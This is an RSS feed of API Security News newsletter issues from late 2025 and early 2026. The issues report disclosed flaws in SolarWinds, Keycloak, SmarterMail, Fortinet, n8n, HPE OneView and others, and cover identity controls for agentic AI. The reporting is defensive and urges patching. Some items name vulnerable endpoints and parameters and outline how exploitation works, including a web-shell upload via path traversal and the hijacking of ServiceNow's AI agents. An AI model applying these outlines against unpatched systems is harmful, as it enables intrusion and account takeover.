<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>API Security News</title>
	<atom:link href="https://apisecurity.io/feed/" rel="self" type="application/rss+xml" />
	<link>https://apisecurity.io/</link>
	<description>The API Security News Newsletter</description>
	<lastBuildDate>Fri, 27 Feb 2026 09:29:27 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	
	<item>
		<title>Issue 289: SolarWinds RCE, Supply-Chain API Exposure, SQL Injection, and Identity for APIs in the Age of Agentic AI</title>
		<link>https://apisecurity.io/issue-289-solarwinds-rce-supply-chain-api-exposure-sql-injection-and-identity-for-apis-in-the-age-of-agentic-ai/</link>
		
		<dc:creator><![CDATA[Philippe Leothaud]]></dc:creator>
		<pubDate>Fri, 27 Feb 2026 09:29:27 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11480</guid>

					<description><![CDATA[<p>This week, we look at how familiar API security failures — authentication bypasses, missing input validation allowing old school attacks like SQL injections — continue to surface across enterprise platforms and critical infrastructure. From exposed supply-chain APIs to identity-layer weaknesses and unauthenticated RCEs, the pattern is clear: basic API controls still break in production. We [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-289-solarwinds-rce-supply-chain-api-exposure-sql-injection-and-identity-for-apis-in-the-age-of-agentic-ai/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-289-solarwinds-rce-supply-chain-api-exposure-sql-injection-and-identity-for-apis-in-the-age-of-agentic-ai/">Issue 289: SolarWinds RCE, Supply-Chain API Exposure, SQL Injection, and Identity for APIs in the Age of Agentic AI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><span style="font-weight: 400;">This week, we look at how familiar API security failures — authentication bypasses, missing input validation allowing old school attacks like SQL injections — continue to surface across enterprise platforms and critical infrastructure.</span></p>
<p><span style="font-weight: 400;">From exposed supply-chain APIs to identity-layer weaknesses and unauthenticated RCEs, the pattern is clear: basic API controls still break in production.</span></p>
<p><span style="font-weight: 400;">We also explore the new identity challenges that emerge with API infrastructures being increasingly consumed by agentic AI ecosystems and how evolving identity standards aim to bring stronger, transaction-scoped controls to answer these challenges.</span></p>
<p><span style="font-weight: 400;">Lastly, yours truly, is co-presenting a webinar on the hot topic of securing Agentic AI with Omdia’s Chief Analyst, Rik Turner. I hope to see you there.</span></p>
<p>&nbsp;</p>
<h2>Vulnerability: SolarWinds Web Help Desk RCE via deserialization</h2>
<p><span style="font-weight: 400;">SolarWinds has fixed a critical unauthenticated remote code execution vulnerability in its Web Help Desk (WHD) platform, resulting from insecure deserialization of untrusted data. According to Horizon3.ai&#8217;s <a href="https://horizon3.ai/attack-research/cve-2025-40551-another-solarwinds-web-help-desk-deserialization-issue/">analysis</a>, the issue stems from the AjaxProxy component, where JSON-RPC request messages are not properly validated against strict schemas before being processed. Because the structure and content of incoming JSON-RPC payloads are not sufficiently constrained, specially crafted requests can reach dangerous deserialization paths and trigger the execution of arbitrary commands without authentication. This flaw, which received a CVSS score of 9.8, has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog and reinforces a persistent lesson for API teams: failures in schema validation at the API boundary often precede full system compromise. SolarWinds has fixed the issue in Web Help Desk 2026.1, and it is strongly recommended that the patch be applied immediately, especially for publicly accessible instances.</span></p>
<p>&nbsp;</p>
<h2>Vulnerability: Keycloak unauthorized access to protected resources through invitation token manipulation</h2>
<p><span style="font-weight: 400;">A high-severity authentication and authorization flaw has been disclosed in Keycloak, the widely used open-source identity and access management platform that is often found upstream of APIs. The vulnerability stems from incorrect validation of the signature of invitation JWT tokens, allowing an attacker to manipulate the contents of the tokens and self-register in organizations different from the one they had been invited to join. By modifying identity-related fields in a valid invitation token and reusing it, an attacker could bypass intended access controls and gain unauthorized access to protected resources. This issue highlights a recurring weakness in API security: the trust placed in context provided by the client or embedded in the token without strict server-side verification. Keycloak has released patches to address this issue, and users are strongly encouraged to update, as vulnerabilities at the identity layer can have cascading effects on all APIs and services that rely on the platform for authentication and authorization. Github advisory is <a href="https://github.com/advisories/GHSA-hcvw-475w-8g7p">here</a>.</span></p>
<p>&nbsp;</p>
<h2>Vulnerability: Bluspark&#8217;s Bluvoyix supply chain platform exposed unauthenticated APIs and plaintext credentials</h2>
<p><span style="font-weight: 400;">Security researcher Eaton Zveare discovered a set of critical vulnerabilities in Bluspark Global&#8217;s Bluvoyix maritime logistics and supply chain platform, which collectively exposed the platform&#8217;s APIs and customer data to the internet. The full disclosure is available here: <a href="https://eaton-works.com/2026/01/14/bluspark-bluvoyix-hack">Bluspark Bluvoyix Security Research</a>. The vulnerabilities included unauthenticated API endpoints that returned sensitive data without credentials, exposed API documentation with interactive testing, the ability to create administrator accounts via unauthenticated HTTP POST requests, retrieval of plaintext passwords for all user accounts, and client-side code that could be used for malicious purposes to send phishing emails. Using these weaknesses in combination, an attacker could have viewed, modified, or canceled shipments and accessed decades of customer data from hundreds of companies using Bluvoyix without ever logging in. Zveare&#8217;s attempts to notify Bluspark were delayed by the lack of disclosure channels, leading to an escalation through the press before the issues were finally fixed and a vulnerability disclosure program was promised. Incidents like this highlight why unprotected APIs and misconfigured authentication remain systemic risks, particularly in critical infrastructure software, and how the lack of secure API design and disclosure processes can greatly amplify their impact.</span></p>
<p>&nbsp;</p>
<h2>Vulnerability: Order Up online ordering system — critical unauthenticated SQL injection</h2>
<p><span style="font-weight: 400;">Security consultant Subhash Paudel of Spartans Security disclosed several unauthenticated SQL injection vulnerabilities in the Order Up v1.0 online ordering system. The full report is available here: <a href="https://www.spartanssec.com/post/multiple-unauthenticated-sql-injection-vulnerabilities">Spartans Security Analysis</a>. The flaws appear in the /api/integrations/getintegrations endpoint, where the store_id parameter of a POST request is integrated into backend SQL queries without proper validation or parameterization on the server side, allowing an unauthenticated attacker to manipulate database logic and retrieve or modify sensitive data. Security testing confirmed the effectiveness of boolean-based and timing-based blind SQL injection techniques, highlighting how easily specially crafted payloads can influence the execution of backend queries, even when no errors are reported. This incident serves as yet another reminder that SQL injection, despite being one of the oldest and most well-known vulnerabilities, remains ubiquitous in API contexts where user input is not rigorously validated and parameterized.</span></p>
<p>&nbsp;</p>
<h2>Article: Identity as the foundation for secure API consumption by agentic AI</h2>
<p><span style="font-weight: 400;">A recent article by Nordic API’s, <a href="https://nordicapis.com/how-identity-guides-agentic-ai-use-of-apis">How Identity Guides the Use of APIs by Agentic AI</a>, by Kristopher Sandoval, highlights a fundamental change: as agentic AI systems increasingly consume APIs autonomously, identity must evolve from static client credentials to contextual, transaction-limited authorization. Traditional API access models assume that clients are predictable and operate within predefined flows. Agentic AI challenges this assumption: agents can dynamically explore API surfaces, chain workflows, and adapt to responses. Without robust and precise identity controls, APIs risk exposing unwanted resources or operations.</span></p>
<p><span style="font-weight: 400;">An emerging <a href="https://datatracker.ietf.org/doc/draft-ietf-oauth-transaction-tokens/">initiative</a> to address these concerns is the IETF&#8217;s OAuth Transaction Tokens project, led by Atul Tulshibagwale SGNL&#8217;s CTO and co-chair of the OpenID Foundation&#8217;s Artificial Intelligence Identity Management (AIIM) working group. Transaction tokens introduce cryptographically verifiable, single-operation identity assertions, allowing APIs to validate not only who an agent represents, but also what specific transaction it is authorized to perform.</span></p>
<p><span style="font-weight: 400;">At the same time, Nicola Gallo expressed similar concerns about identity and authorization in agent ecosystems, advocating compliance with the <a href="https://github.com/pic-protocol/pic-spec/blob/main/draft/0.1/pic-spec.md">PIC (Principle of Identity Context) specification</a>, which emphasizes the explicit propagation of identity context and its strict enforcement across service boundaries. The PIC specification offers a structured approach to maintaining verifiable identity continuity throughout API interactions, reinforcing the principle of least privilege and contextual authorization. </span></p>
<p><span style="font-weight: 400;">Together, these initiatives reflect a growing recognition that identity architecture—not just token issuance—will define the security of agent-driven API infrastructures consumption.</span></p>
<p>&nbsp;</p>
<h2>Webinar: Agentic AI &#8211; Fools rush in where Angels fear to Tread</h2>
<p><span style="font-weight: 400;">Next month I will be in discussion with Rik Turner, Chief Analyst at Omdia about how MCP can securely enable and accelerate the exposition of the API infrastructure to agentic AI.</span></p>
<p><span style="font-weight: 400;">Enterprises are racing to adopt AI — but are they moving forward strategically, or simply following the hype cycle?  We will look to separate signal from noise and explore the practical implications for enterprises seeking to enable agentic AI. </span><span style="font-weight: 400;"><br />
</span><span style="font-weight: 400;"><br />
</span>Register <a href="https://42crunch.com/agentic-ai-security-webinar/">here</a> to attend the webinar</p>
<p>The post <a href="https://apisecurity.io/issue-289-solarwinds-rce-supply-chain-api-exposure-sql-injection-and-identity-for-apis-in-the-age-of-agentic-ai/">Issue 289: SolarWinds RCE, Supply-Chain API Exposure, SQL Injection, and Identity for APIs in the Age of Agentic AI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 288: State of API Security 2026, Agentic AI, Authentication Bypasses, and the Race to Patch APIs</title>
		<link>https://apisecurity.io/issue-288-42crunch-state-of-api-security-2026-agentic-ai-authentication-bypasses-and-the-race-to-patch-apis/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 29 Jan 2026 17:17:21 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11465</guid>

					<description><![CDATA[<p>This week, we look at how long-standing API security failures are being amplified by automation, AI, and increasingly aggressive exploitation timelines. From agentic AI vulnerabilities in ServiceNow to authentication bypasses actively exploited in SmarterMail and Fortinet infrastructure, this issue highlights how broken authentication and authorization continue to dominate real-world incidents.  We also dive into the 42Crunch [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-288-42crunch-state-of-api-security-2026-agentic-ai-authentication-bypasses-and-the-race-to-patch-apis/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-288-42crunch-state-of-api-security-2026-agentic-ai-authentication-bypasses-and-the-race-to-patch-apis/">Issue 288: State of API Security 2026, Agentic AI, Authentication Bypasses, and the Race to Patch APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, we look at how long-standing API security failures are being amplified by automation, AI, and increasingly aggressive exploitation timelines. </span><span style="font-weight: 400;">From agentic AI vulnerabilities in ServiceNow to authentication bypasses actively exploited in SmarterMail and Fortinet infrastructure, this issue highlights how broken authentication and authorization continue to dominate real-world incidents. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">We also dive into the 42Crunch State of API Security 2026 report, which analyzes 200 production vulnerabilities to show why these patterns persist — and why, as AI agents become first-class API consumers, insecure APIs are far less likely to remain unnoticed or unexploited.</span></p>
<h2 style="font-weight: 400;">Vulnerability: ServiceNow “BodySnatcher”: Agentic AI Vulnerability Leads to User Impersonation</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A critical agentic AI security flaw dubbed BodySnatcher (CVE-2025-12420) has been uncovered in ServiceNow’s Virtual Agent API and Now Assist AI Agents platform, illustrating how autonomous AI integrations can introduce catastrophic risks when identity and access logic are weak. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://appomni.com/ao-labs/bodysnatcher-agentic-ai-security-vulnerability-in-servicenow" target="_blank" rel="noopener">Researchers</a> at AppOmni found that an unauthenticated attacker could impersonate </span><i><span style="font-weight: 400;">any user</span></i><span style="font-weight: 400;"> — including administrators — using only a target’s email address by chaining a hardcoded platform-wide secret with overly permissive account-linking logic, effectively bypassing multi-factor authentication (MFA), single sign-on (SSO), and other controls. Once impersonation was achieved, the attacker could remotely invoke AI agent workflows as the victim, create backdoor admin accounts, and execute privileged actions, weaponizing automation to subvert enterprise controls and escalate access. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">AppOmni described BodySnatcher as “the most severe AI-driven security vulnerability uncovered to date,” highlighting how traditional authentication and API security weaknesses become dramatically worse when high-privilege agents are involved. ServiceNow has since patched the vulnerability in affected versions, but the incident underscores the need for rigorous identity verification, least-privilege agent scoping, and runtime governance of AI agents to prevent similar exploits. </span></p>
<h2 style="font-weight: 400;">Vulnerability: SmarterMail Authentication Bypass (CVE-2026-23760) Exploited in the Wild</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A critical authentication bypass vulnerability in SmarterTools’ SmarterMail email and collaboration platform — tracked as CVE-2026-23760 and <a href="https://labs.watchtowr.com/attackers-with-decompilers-strike-again-smartertools-smartermail-wt-2026-0001-auth-bypass/" target="_blank" rel="noopener">originally reported</a> by WatchTowr Labs  — is now being actively exploited in the wild even after a patch was released. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The flaw exists in the /api/v1/auth/force-reset-password API endpoint, allowing users to reset their password. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">While normally password reset “rely on a second factor or out-of-band proof of control &#8211; for example, a secret token delivered via email”, as WatchTowr Labs frames it, there was no such protection in place. Instead, the old password was requested, suggesting that SmarterMail developers mixed change password and reset password functionalities… </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Furthermore, while in place for regular users, validation of the existing old password was not even done processing password reset requests for system administrator accounts!</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Knowing the username of an admin account was therefore enough to change his password, gaining full administrative access to the SmarterMail instance and, through built-in admin features, execute arbitrary operating system commands at SYSTEM level on the host. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Evidence suggests attackers very quickly reverse-engineered the patch shipped in Build 9511 (January 15, 2026) and began abusing the flaw within 48 hours, demonstrating how rapidly critical API authentication bypasses can be weaponized post-disclosure. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Organizations running vulnerable versions should update immediately and validate that the forced reset path is protected. </span></p>
<h2 style="font-weight: 400;">Vulnerability: Fortinet FortiCloud SSO Authentication Bypass (CVE-2026-24858)</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">Fortinet has released urgent patches for a critical authentication bypass vulnerability tracked as CVE-2026-24858, which has been actively exploited in the wild across multiple Fortinet products, including FortiOS, FortiManager, and FortiAnalyzer. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The flaw, categorized as an authentication bypass using an alternate path or channel (CWE-288), allows an attacker with a FortiCloud account and a registered device to authenticate to devices registered under </span><b><i>other</i></b><span style="font-weight: 400;"> FortiCloud accounts when FortiCloud SSO is enabled — effectively breaking account isolation and granting unauthorized administrative access without valid credentials.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://thehackernews.com/2026/01/fortinet-patches-cve-2026-24858-after.html?utm_source=chatgpt.com" target="_blank" rel="noopener">Exploitation</a> has enabled attackers to create persistent admin accounts and exfiltrate device configurations before patches were widely deployed.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">From an OWASP perspective, this maps to OWASP API2: Broken Authentication, where flawed assumptions about identity, trust relationships, or authentication flows allow attackers to bypass access controls entirely. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Coincidentally (or not!), this incident directly reflects a key finding from the 42Crunch State of API Security 2026 report: authentication bypass remains one of the most prevalent real-world API vulnerabilities, consistently showing up in production breaches due to gaps in access control and trust boundaries. </span></p>
<h2 style="font-weight: 400;">Report: State of API Security 2026: What Real Vulnerabilities Tell Us About the Year Ahead</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">42Crunch published their <a href="https://42crunch.com/state-of-api-security-2026-report/" target="_blank" rel="noopener">State of API Security 2026</a> report</span><span style="font-weight: 400;">. This report delivers a data-driven analysis of 200 real-world API vulnerabilities observed in production between 2024 and 2025, drawn directly from APISecurity.io newsletter coverage and independently verified cases. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Rather than focusing on theoretical risks, the report highlights how common development mistakes — such as missing authentication, broken authorization, weak input validation, and client-side security assumptions — consistently lead to serious breaches across industries. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Looking ahead, it also examines how AI agents and LLMs fundamentally change the API risk model, increasing the likelihood that latent vulnerabilities will be discovered and exploited in production. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The report translates these findings into clear development responsibilities and preventative practices, helping teams prioritize governance and build APIs that are secure by design in an AI-driven ecosystem. </span></p>
<h2 style="font-weight: 400;">Report: AI-Assisted Patch Diffing and the New Exploit Race</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;"><a href="https://www.akamai.com/blog/security-research/patch-wednesday-root-cause-analysis-with-llms" target="_blank" rel="noopener">Recent research</a> by Akamai demonstrates how large language models can be used to automate patch diff analysis, rapidly identifying the root cause of security patches and the precise code changes that fix them. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Tools like PatchDiff-AI ingest vendor binaries and patch metadata, and generate detailed root-cause analysis reports in a fraction of the time it would take a human — compressing what used to take weeks into hours or even minutes.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This accelerated analysis is a double-edged sword: while defenders can understand fixes faster, </span><b>attackers can use the same insights to craft one-day exploits targeting newly disclosed vulnerabilities almost immediately after their patches are published</b><span style="font-weight: 400;">. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The SmarterMail authentication bypass exploit we just discussed, which was weaponized within days (hours? minutes?) of a patch release, is a clear example of this emerging threat landscape. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">In a world where AI can quickly translate patch diffs into exploit logic, timely updates and automated patch deployment are no longer optional — they are essential to stay ahead of attackers who are increasingly using AI-assisted techniques to turn disclosures into active threats in an extremely short time. </span></p>
<p>The post <a href="https://apisecurity.io/issue-288-42crunch-state-of-api-security-2026-agentic-ai-authentication-bypasses-and-the-race-to-patch-apis/">Issue 288: State of API Security 2026, Agentic AI, Authentication Bypasses, and the Race to Patch APIs</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 287: Critical RCEs in n8n, HPE OneView, SmarterMail, and an Authentication Bypass in IBM API Connect</title>
		<link>https://apisecurity.io/issue-287-critical-rces-in-n8n-hpe-oneview-smartermail-and-an-authentication-bypass-in-ibm-api-connect/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 15 Jan 2026 14:18:29 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11449</guid>

					<description><![CDATA[<p>Welcome to this first edition of the APIsecurity newsletter for 2026, I’m Philippe Leothaud, CTO and co-founder of 42Crunch, and your new Newsletter Editor. I’d like to thank Anthony Lonergan for the excellent work he’s done over the years building this newsletter into a trusted source for API security news and insights. I’ll continue that [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-287-critical-rces-in-n8n-hpe-oneview-smartermail-and-an-authentication-bypass-in-ibm-api-connect/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-287-critical-rces-in-n8n-hpe-oneview-smartermail-and-an-authentication-bypass-in-ibm-api-connect/">Issue 287: Critical RCEs in n8n, HPE OneView, SmarterMail, and an Authentication Bypass in IBM API Connect</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">Welcome to this first edition of the APIsecurity newsletter for 2026, I’m Philippe Leothaud, CTO and co-founder of 42Crunch, and your new Newsletter Editor. I’d like to thank Anthony Lonergan for the excellent work he’s done over the years building this newsletter into a trusted source for API security news and insights. I’ll continue that tradition — with a strong focus on real-world API incidents, design-time protections, and the growing impact of automation and AI on API ecosystems.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Below are the most significant API-relevant security stories from the last few weeks — from critical RCEs to gateway authentication bypasses and automation-platform exploits and an excellent article on BOLA.</span></p>
<h2 style="font-weight: 400;">Vulnerability: Ni8mare &#8211; Critical Unauthenticated RCE in n8n Workflows</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A new critical vulnerability in the n8n workflow automation platform — tracked as CVE-2026-21858 and dubbed </span><i><span style="font-weight: 400;">Ni8mare</span></i><span style="font-weight: 400;"> — discovered by the Data Security Platform vendor Cyera has shaken the automation world with its maximum CVSS 10.0 severity and unauthenticated remote code execution potential. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue stems from a Content-Type parsing confusion in n8n webhooks and form requests, enabling attackers to override expected input structures and read arbitrary server files, including configuration and authentication secrets. With those secrets, attackers can forge administrative sessions and build malicious workflows that execute arbitrary code without valid credentials. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Because n8n sits at the heart of many API integrations and automation pipelines, a compromised instance can pivot into broader environments. All internet-accessible deployments prior to v1.121.0 are vulnerable and should be patched immediately; restricting public webhook and form endpoints can reduce exposure in the meantime. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">See the<a href="https://www.cyera.com/research-labs/ni8mare-unauthenticated-remote-code-execution-in-n8n-cve-2026-21858" target="_blank" rel="noopener"> full analysis</a> by Cyera Research Labs</span></p>
<h2 style="font-weight: 400;">Vulnerability: IBM API Connect &#8211; Critical Authentication Bypass</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">IBM has disclosed and patched a critical authentication bypass in IBM API Connect, rated CVSS 9.8. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Classified as </span><i><span style="font-weight: 400;">CWE-305: Authentication Bypass by Primary Weakness</span></i><span style="font-weight: 400;">, this flaw allows remote attackers with no privileges and no user interaction to bypass authentication and gain unauthorized access to API Connect’s management interfaces. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Successful exploitation can expose sensitive API configurations, administrative functions, and backend services without valid credentials — undermining a core access control layer in API infrastructure. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Affected versions include 10.0.8.0 through 10.0.8.5 and 10.0.11.0; IBM has published interim fixes (iFixes) to remediate the issue. Customers unable to patch immediately should harden access to management interfaces as an interim control. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Some <a href="https://www.tenable.com/cve/CVE-2025-13915" target="_blank" rel="noopener">information is available</a></span><span style="font-weight: 400;">,</span><span style="font-weight: 400;"> though the details of the problem were not unveiled publicly. </span></p>
<h2 style="font-weight: 400;">Vulnerability: HPE OneView &#8211; RCE via unauthenticated REST API operation</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">A maximum-severity RCE flaw has been disclosed in Hewlett Packard Enterprise OneView, a centralized infrastructure management platform. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">This vulnerability exists in a REST API endpoint (<code>/rest/id-pools/executeCommand</code></span>) <span style="font-weight: 400;"> that accepts command parameters without proper authentication, allowing unauthenticated attackers to inject and execute arbitrary code on affected servers. Rapid7’s <a href="https://www.rapid7.com/blog/post/etr-cve-2025-37164-critical-unauthenticated-rce-affecting-hewlett-packard-enterprise-oneview/" target="_blank" rel="noopener">research</a> highlights how the lack of authentication enforcement in the</span> <code>executeCommand</code> <span style="font-weight: 400;">API effectively exposes powerful control functions to attackers. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Because OneView manages servers, firmware, networking, and lifecycle workflows, exploitation can lead to full infrastructure compromise. U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added it to its </span><i><span style="font-weight: 400;">Known Exploited Vulnerabilities</span></i><span style="font-weight: 400;"> catalog, underscoring active risk. Affected installations should update to v11.0 or apply vendor hotfixes immediately. </span></p>
<h2 style="font-weight: 400;">Vulnerability: SmarterMail &#8211; Pre-Auth RCE in Email Server</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">After the n8n vulnerability, another file upload-based issue opening the door to unauthenticated remote code execution was identified in SmarterTools’ SmarterMail platform, earning a CVSS 10.0 rating and prompting advisories from Singapore’s Cyber Security Agency (CSA). </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">WatchTowr Labs’, as always, excellent <a href="https://labs.watchtowr.com/do-smart-people-ever-say-theyre-smart-smartertools-smartermail-pre-auth-rce-cve-2025-52691/" target="_blank" rel="noopener">analysis</a> shows that an unauthenticated file-upload API (</span><span style="font-weight: 400;"><code>/api/upload</code></span><span style="font-weight: 400;">) fails to validate user-supplied path parameters (</span><span style="font-weight: 400;"><code>contextData</code></span><span style="font-weight: 400;">), enabling path traversal and writing of files (such as web shells) to arbitrary locations. Attackers can upload a malicious .aspx shell into a web-visible directory, leading to full RCE under the SmarterMail service context. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The issue was silently patched in Build 9413 (October 2025) and the public advisory lagged, creating a significant exposure window for internet-facing deployments. Administrators should update immediately and audit for unauthorized artifacts. </span></p>
<h2 style="font-weight: 400;">Article: Do you really understand BOLA?</h2>
<p style="font-weight: 400;"><span style="font-weight: 400;">In our last </span><a href="https://apisecurity.io/issue-286-the-apisecurity-io-top-5-api-vulnerabilities-in-2025/" target="_blank" rel="noopener"><span style="font-weight: 400;">issue of 2025</span></a><span style="font-weight: 400;">, we pointed out the most frequent </span><span style="font-weight: 400;">vulnerabilities</span><span style="font-weight: 400;"> identified in this newsletter in the previous 12 months. Number 2 on that list was BOLA (</span><a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/" target="_blank" rel="noopener"><span style="font-weight: 400;">Broken Object Level Authorization</span></a><span style="font-weight: 400;">). BOLA is still a major problem. In his </span><a href="https://hackernoon.com/the-authorization-gap-no-one-wants-to-talk-about-why-your-api-is-probably-leaking-right-now" target="_blank" rel="noopener"><span style="font-weight: 400;">recent article</span></a><span style="font-weight: 400;"> on Hackernoon, Igboanugo David Ugochukwu gives an excellent, detailed explanation of BOLA, the #1 API security vulnerability </span><span style="font-weight: 400;">identified </span><span style="font-weight: 400;">by OWASP.</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">He asks a simple question: “So once I&#8217;m logged in as User 47, what stops me from just requesting User 48&#8217;s data?&#8221; As he rightly pointed out  “the vulnerability that sounds boring in conference talks but costs companies their entire customer database on a Tuesday afternoon!”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">And his advice on how to fix it? “&#8230;you need every engineer who touches user data to ask, &#8216;Am I checking that this user is allowed to access this specific object?&#8221; Every time. No exceptions.”..”</span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">BOLA needs a proper DevSecOps approach, and too many people are not tackling it correctly, resulting in many APIs today probably leaking data right now.</span></p>
<h2 style="font-weight: 400;">Webinar: State of API Security 2026</h2>
<p style="font-weight: 400;">Join Anthony Lonergan and Heshaam Attar later this month for a webinar introducing the <a href="https://42crunch.com/api-security-research-report-and-outlook-for-2026/" target="_blank" rel="noopener">State of API Security Report.</a></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">The 2026 report delivers a data-driven analysis of real-world API vulnerabilities, showing how common mistakes in implementation translate into security risks in production. </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">Drawing on two years of investigative research from the industry’s leading APIsecurity.io newsletter that includes cases from a wide range of independent sources, the webinar highlights the most common API flaws, from broken input validation and missing authentication to operation-level authorization failures.</span></p>
<p>The post <a href="https://apisecurity.io/issue-287-critical-rces-in-n8n-hpe-oneview-smartermail-and-an-authentication-bypass-in-ibm-api-connect/">Issue 287: Critical RCEs in n8n, HPE OneView, SmarterMail, and an Authentication Bypass in IBM API Connect</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 286: The APISecurity.io Top 5 API Vulnerabilities in 2025</title>
		<link>https://apisecurity.io/issue-286-the-apisecurity-io-top-5-api-vulnerabilities-in-2025/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Wed, 10 Dec 2025 15:01:32 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<category><![CDATA[api security]]></category>
		<category><![CDATA[API vulnerabilities]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=11438</guid>

					<description><![CDATA[<p>This week, in our final 2025 issue of APISecurity.io, we look back at the five most frequent API vulnerabilities covered in the newsletter over the past 12 months. These issues highlight common mistakes teams make in API development and can help to spotlight where security efforts can deliver the biggest opportunity to reduce risk.   I’d [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-286-the-apisecurity-io-top-5-api-vulnerabilities-in-2025/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-286-the-apisecurity-io-top-5-api-vulnerabilities-in-2025/">Issue 286: The APISecurity.io Top 5 API Vulnerabilities in 2025</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p style="font-weight: 400;"><span style="font-weight: 400;">This week, in our final 2025 issue of APISecurity.io, we look back at the five most frequent API vulnerabilities covered in the newsletter over the past 12 months. These issues highlight common mistakes teams make in API development and can help to spotlight where security efforts can deliver the biggest opportunity to reduce risk.  </span></p>
<p style="font-weight: 400;"><span style="font-weight: 400;">I’d like to wish all APISecurity.io followers the very best for the year ahead. No doubt we’ll have plenty more API security news and challenges to cover in 2026!</span></p>
<h2><span style="font-weight: 400;">Vulnerability #1: Missing Authentication</span></h2>
